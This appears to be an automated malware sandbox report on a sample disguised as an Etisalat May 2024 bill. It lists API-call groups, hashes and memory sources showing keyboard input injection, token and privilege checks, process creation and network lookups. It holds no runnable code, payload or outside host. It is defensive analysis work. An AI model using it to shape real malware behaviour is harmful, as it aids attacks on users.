                                      • Opcode ID: 08817475d57d2ab2741874f426a9b83277fdb5701f9be51895584c2eb8221c2f
                                      • Instruction ID: 0e8df519fb082d6fc507b0472a58c12e2cb6c42455ceaf1179bacaab5a309569
                                      • Opcode Fuzzy Hash: 08817475d57d2ab2741874f426a9b83277fdb5701f9be51895584c2eb8221c2f
                                      • Instruction Fuzzy Hash: 1331B4B4600A84BFEF209B3ADC95FA937E5EB05310F244692FA59D72E1CF32E9409751
                                      APIs
                                      • ClientToScreen.USER32(?,?), ref: 00BEAE1A
                                      • GetWindowRect.USER32(?,?), ref: 00BEAE90
                                      • PtInRect.USER32(?,?,00BEC304), ref: 00BEAEA0
                                      • MessageBeep.USER32(00000000), ref: 00BEAF11
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Rect$BeepClientMessageScreenWindow
                                      • String ID:
                                      • API String ID: 1352109105-0
                                      • Opcode ID: 771a78fa358fe030a42790376970f99235d23a76d18253e077eac226ba599089
                                      • Instruction ID: 6388c7af5a3cfbaa13ae86c847c1ebf85d96936e3e093496492a7e3f936c6203
                                      • Opcode Fuzzy Hash: 771a78fa358fe030a42790376970f99235d23a76d18253e077eac226ba599089
                                      • Instruction Fuzzy Hash: 06417C70600199DFCB21CF6AC884B69BBF9FF48340F2481E9E419DB251D730A902CB92
                                      APIs
                                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00BC1037
                                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00BC1053
                                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00BC10B9
                                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00BC110B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      • Opcode ID: 81bbf629f011bafa6856cdb3e039ab5c061dba621bc35ff45d781c300fa655dd
                                      • Instruction ID: 4c523352f660a56ac65ab2652ea0b91f6674cbe3007596ca3be93a4ffa0d6d88
                                      • Opcode Fuzzy Hash: 81bbf629f011bafa6856cdb3e039ab5c061dba621bc35ff45d781c300fa655dd
                                      • Instruction Fuzzy Hash: A6312A30A40688AEFB308B6D8C05FF9BBE5EB57310F08469EE580661D2C37449C19751
                                      APIs
                                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00BC1176
                                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00BC1192
                                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00BC11F1
                                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00BC1243
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
• Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: KeyboardState$InputMessagePostSend
                                      • String ID:
                                      • API String ID: 432972143-0
                                      APIs
                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00B9644B
                                      • __isleadbyte_l.LIBCMT ref: 00B96479
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B964A7
                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00B964DD
                                      Similarity
                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                      • String ID:
                                      • API String ID: 3058430110-0
                                      APIs
                                      • GetForegroundWindow.USER32 ref: 00BE5189
                                        • Part of subcall function 00BC387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00BC3897
                                        • Part of subcall function 00BC387D: GetCurrentThreadId.KERNEL32 ref: 00BC389E
                                        • Part of subcall function 00BC387D: AttachThreadInput.USER32(00000000,?,00BC52A7), ref: 00BC38A5
                                      • GetCaretPos.USER32(?), ref: 00BE519A
                                      • ClientToScreen.USER32(00000000,?), ref: 00BE51D5
                                      • GetForegroundWindow.USER32 ref: 00BE51DB
                                      Similarity
                                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                      • String ID:
                                      • API String ID: 2759813231-0
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • GetCursorPos.USER32(?), ref: 00BEC7C2
                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00B9BBFB,?,?,?,?,?), ref: 00BEC7D7
                                      • GetCursorPos.USER32(?), ref: 00BEC824
                                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00B9BBFB,?,?,?), ref: 00BEC85E
                                      Similarity
                                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                                      • String ID:
                                      • API String ID: 2864067406-0
                                      APIs
                                        • Part of subcall function 00BB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00BB8669
                                        • Part of subcall function 00BB8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8673
                                        • Part of subcall function 00BB8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8682
                                        • Part of subcall function 00BB8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB8689
                                        • Part of subcall function 00BB8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00BB869F
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00BB8BEB
                                      • _memcmp.LIBCMT ref: 00BB8C0E
                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00BB8C44
                                      • HeapFree.KERNEL32(00000000), ref: 00BB8C4B
                                      Similarity
                                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                      • String ID:
                                      • API String ID: 1592001646-0
                                      APIs
                                      • __setmode.LIBCMT ref: 00B80BF2
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      • _fprintf.LIBCMT ref: 00B80C29
                                      • OutputDebugStringW.KERNEL32(?), ref: 00BB6331
                                        • Part of subcall function 00B84CDA: _flsall.LIBCMT ref: 00B84CF3
                                      • __setmode.LIBCMT ref: 00B80C5E
                                      Similarity
                                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                      • String ID:
                                      • API String ID: 521402451-0
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00BD1A97
                                        • Part of subcall function 00BD1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00BD1B40
                                        • Part of subcall function 00BD1B21: InternetCloseHandle.WININET(00000000), ref: 00BD1BDD
                                      Similarity
                                      • API ID: Internet$CloseConnectHandleOpen
                                      • String ID:
                                      • API String ID: 1463438336-0
                                      APIs
                                        • Part of subcall function 00BBF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00BBE1C4,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?), ref: 00BBF5BC
                                        • Part of subcall function 00BBF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00BBF5E2
                                        • Part of subcall function 00BBF5AD: lstrcmpiW.KERNEL32(00000000,?,00BBE1C4,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?), ref: 00BBF613
                                      • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00BBEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00BBE1DD
                                      • lstrcpyW.KERNEL32(00000000,?), ref: 00BBE203
                                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00BBEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00BBE237
                                      Strings
                                      Similarity
                                      • API ID: lstrcmpilstrcpylstrlen
                                      • String ID: cdecl
                                      • API String ID: 4031866154-3896280584
                                      APIs
                                      • _free.LIBCMT ref: 00B95351
                                        • Part of subcall function 00B8594C: __FF_MSGBANNER.LIBCMT ref: 00B85963
                                        • Part of subcall function 00B8594C: __NMSG_WRITE.LIBCMT ref: 00B8596A
                                        • Part of subcall function 00B8594C: RtlAllocateHeap.NTDLL(01630000,00000000,00000001,00000000,?,?,?,00B81013,?), ref: 00B8598F
                                      Similarity
                                      • API ID: AllocateHeap_free
                                      • String ID:
                                      • API String ID: 614378929-0
                                      APIs
                                      • _memset.LIBCMT ref: 00B64560
                                        • Part of subcall function 00B6410D: _memset.LIBCMT ref: 00B6418D
                                        • Part of subcall function 00B6410D: _wcscpy.LIBCMT ref: 00B641E1
                                        • Part of subcall function 00B6410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B641F1
                                      • KillTimer.USER32(?,00000001,?,?), ref: 00B645B5
                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00B645C4
                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B9D6CE
                                      Similarity
                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                      • String ID:
                                      • API String ID: 1378193009-0
                                      APIs
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00BC7B20,?,?,00000000), ref: 00B65B8C
                                        • Part of subcall function 00B65B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00BC7B20,?,?,00000000,?,?), ref: 00B65BB0
                                      • gethostbyname.WSOCK32(?,?,?), ref: 00BD66AC
                                      • WSAGetLastError.WSOCK32(00000000), ref: 00BD66B7
                                      • _memmove.LIBCMT ref: 00BD66E4
                                      • inet_ntoa.WSOCK32(?), ref: 00BD66EF
                                      Similarity
                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                      • String ID:
                                      • API String ID: 1504782959-0
                                      APIs
                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00BB9043
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB9055
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB906B
                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00BB9086
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID:
                                      • API String ID: 3850602802-0
                                      APIs
                                        • Part of subcall function 00B62612: GetWindowLongW.USER32(?,000000EB), ref: 00B62623
                                      • DefDlgProcW.USER32(?,00000020,?), ref: 00B612D8
                                      • GetClientRect.USER32(?,?), ref: 00B9B84B
                                      • GetCursorPos.USER32(?), ref: 00B9B855
                                      • ScreenToClient.USER32(?,?), ref: 00B9B860
                                      Similarity
                                      • API ID: Client$CursorLongProcRectScreenWindow
                                      • String ID:
                                      • API String ID: 4127811313-0
                                      APIs
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC166F
                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC1694
                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC169E
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,00BC01FD,?,00BC1250,?,00008000), ref: 00BC16D1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CounterPerformanceQuerySleep
                                      • String ID:
                                      • API String ID: 2875609808-0
                                      • Opcode ID: 6b031a50fe69e8227b0add061a75755953652c23fc0a22e92c8cc499da16dacc
                                      • Instruction ID: 7bda5191a4a0d26d3bd596d1f8e6b0832c992fc5ab139fe8d4356b2ac533c415
                                      • Opcode Fuzzy Hash: 6b031a50fe69e8227b0add061a75755953652c23fc0a22e92c8cc499da16dacc
                                      • Instruction Fuzzy Hash: 7A115E31C0051DD7CF00AFA9D988BFEBBB8FF0A751F0545A9E941B6241CB309560DB96
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction ID: a044d3c3ad84bf15c1c421d5f80ccf5e24cc2d243157b7744ad7431d9f7b4e5a
                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                      • Instruction Fuzzy Hash: C60140360A414ABBCF125F84CC41CEE3FA2FF5A355F5885A5FA1858031DA37C9B1AB85
                                      APIs
                                      • GetWindowRect.USER32(?,?), ref: 00BEB59E
                                      • ScreenToClient.USER32(?,?), ref: 00BEB5B6
                                      • ScreenToClient.USER32(?,?), ref: 00BEB5DA
                                      • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00BEB5F5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: ClientRectScreen$InvalidateWindow
                                      • String ID:
                                      • API String ID: 357397906-0
                                      • Opcode ID: 9c36512c257145ab2ad8bb35282ca619be3d3d5e7c393fb5120944989c7cd5b6
                                      • Instruction ID: caaed16be8be5f288c8f8b3ce01100bb444d054dfc8787a2bdcbd0b3bc61598e
                                      • Opcode Fuzzy Hash: 9c36512c257145ab2ad8bb35282ca619be3d3d5e7c393fb5120944989c7cd5b6
                                      • Instruction Fuzzy Hash: 311134B5D0024AEFDB41CF99D4849EEBBF5FB18310F108166E914E3220D735AA55DF50
                                      APIs
                                      • _memset.LIBCMT ref: 00BEB8FE
                                      • _memset.LIBCMT ref: 00BEB90D
                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00C27F20,00C27F64), ref: 00BEB93C
                                      • CloseHandle.KERNEL32 ref: 00BEB94E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: _memset$CloseCreateHandleProcess
                                      • String ID:
                                      • API String ID: 3277943733-0
                                      • Opcode ID: 1d846c27207fe8c51fcd80a65e482abad1d4f90cbdeaded308dcc40e6b292258
                                      • Instruction ID: 914fd10a8eb33fb119142040108e21e51359ab51eaa4a3f7b38daccb35f0ec45
                                      • Opcode Fuzzy Hash: 1d846c27207fe8c51fcd80a65e482abad1d4f90cbdeaded308dcc40e6b292258
                                      • Instruction Fuzzy Hash: 06F082F25583517BF62127A1AD85FBF3A9CEB08754F000160BB08DA9A6D7714D11C7B8
                                      APIs
                                      • EnterCriticalSection.KERNEL32(?), ref: 00BC6E88
                                        • Part of subcall function 00BC794E: _memset.LIBCMT ref: 00BC7983
                                      • _memmove.LIBCMT ref: 00BC6EAB
                                      • _memset.LIBCMT ref: 00BC6EB8
                                      • LeaveCriticalSection.KERNEL32(?), ref: 00BC6EC8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                      • String ID:
                                      • API String ID: 48991266-0
                                      • Opcode ID: 719da82565f0b45c07278052c852947b9d5d0c196605aea08a2604983943257f
                                      • Instruction ID: c8f022bd4892d2f1d71e3ac9a4ff0a2a929b821be99237345bc88edea7bc2737
                                      • Opcode Fuzzy Hash: 719da82565f0b45c07278052c852947b9d5d0c196605aea08a2604983943257f
                                      • Instruction Fuzzy Hash: 79F0543A100200BBCF016F55DC85F59BB69EF45320B14C0A5FE085F226CB71A911CBB4
                                      APIs
                                        • Part of subcall function 00B612F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B6134D
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6135C
                                        • Part of subcall function 00B612F3: BeginPath.GDI32(?), ref: 00B61373
                                        • Part of subcall function 00B612F3: SelectObject.GDI32(?,00000000), ref: 00B6139C
                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00BEC030
                                      • LineTo.GDI32(00000000,?,?), ref: 00BEC03D
                                      • EndPath.GDI32(00000000), ref: 00BEC04D
                                      • StrokePath.GDI32(00000000), ref: 00BEC05B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                      • String ID:
                                      • API String ID: 1539411459-0
                                      • Opcode ID: ce969ae60354a390f2d42a1abd00a274719a02bcf05a781fb9eb80b1d30df345
                                      • Instruction ID: 0d53c7a1ddbb5af946a0292900b4f2b747691eaec63eecf789dbaa133defdd70
                                      • Opcode Fuzzy Hash: ce969ae60354a390f2d42a1abd00a274719a02bcf05a781fb9eb80b1d30df345
                                      • Instruction Fuzzy Hash: 63F0823200129AFBDB226F55AC0AFDE3F99AF05311F044040FB11660E38B795662DFE5
                                      APIs
                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00BBA399
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BBA3AC
                                      • GetCurrentThreadId.KERNEL32 ref: 00BBA3B3
                                      • AttachThreadInput.USER32(00000000), ref: 00BBA3BA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                      • String ID:
                                      • API String ID: 2710830443-0
                                      • Opcode ID: f10a86c210c1ab0f1f08455b194aaa0865940c9c287738f23edd886f2a30caf7
                                      • Instruction ID: 55b601a737c16296b98b459049582f7d28636d21faf50d9134e735d27afa1ad3
                                      • Opcode Fuzzy Hash: f10a86c210c1ab0f1f08455b194aaa0865940c9c287738f23edd886f2a30caf7
                                      • Instruction Fuzzy Hash: 82E0ED31545369BBDB205FA2DC4DEFB7F9CEF167A1F008065F5099A0A0CAB1C540DBA5
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 00B62231
                                      • SetTextColor.GDI32(?,000000FF), ref: 00B6223B
                                      • SetBkMode.GDI32(?,00000001), ref: 00B62250
                                      • GetStockObject.GDI32(00000005), ref: 00B62258
                                      • GetWindowDC.USER32(?,00000000), ref: 00B9C0D3
                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00B9C0E0
                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00B9C0F9
                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00B9C112
                                      • GetPixel.GDI32(00000000,?,?), ref: 00B9C132
                                      • ReleaseDC.USER32(?,00000000), ref: 00B9C13D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                      • String ID:
                                      • API String ID: 1946975507-0
                                      • Opcode ID: 17ab27f07df96425bf31929f69a28d22ad03c07f4da5f3e66b89538068545d67
                                      • Instruction ID: 5dc50abcea8ab50cd442388d158fdd3d3358a8e9cdea619751ee3a9a937ba42b
                                      • Opcode Fuzzy Hash: 17ab27f07df96425bf31929f69a28d22ad03c07f4da5f3e66b89538068545d67
                                      • Instruction Fuzzy Hash: EDE06531100185EAEF215F64FC4D7E83F54EB15332F0083B6FA695C0E18B714980DB12
                                      APIs
                                      • GetCurrentThread.KERNEL32 ref: 00BB8C63
                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00BB882E), ref: 00BB8C6A
                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00BB882E), ref: 00BB8C77
                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00BB882E), ref: 00BB8C7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1977357519.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                      • Associated: 00000000.00000002.1977338070.0000000000B60000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000BEF000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977398175.0000000000C15000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977446502.0000000000C1F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1977463502.0000000000C28000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b60000_Details of Your Etisalat Summary Bill for the Month of May 2024.jbxd
                                      Similarity
                                      • API ID: CurrentOpenProcessThreadToken
                                      • String ID:
                                      • API String ID: 3974789173-0
                                      • Opcode ID: 0db59bc8f10802f28a4cbfcc13162dbe1011af8bafd1d82f0a43592ea600b023
                                      • Instruction ID: ebcf293b32296a5785024e503ccf70ec28db447a051b2023ccf4ee3a29d8bbe0
                                      • Opcode Fuzzy Hash: 0db59bc8f10802f28a4cbfcc13162dbe1011af8bafd1d82f0a43592ea600b023
                                      • Instruction Fuzzy Hash: 49E08676642252EBD7205FB07D4CBB63BACEF50792F054868B245CF041DE748441CB61
                                      APIs
                                      • GetDesktopWindow.USER32 ref: 00BA2187
                                      • GetDC.USER32(00000000), ref: 00BA2191
                                      • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00BA21B1
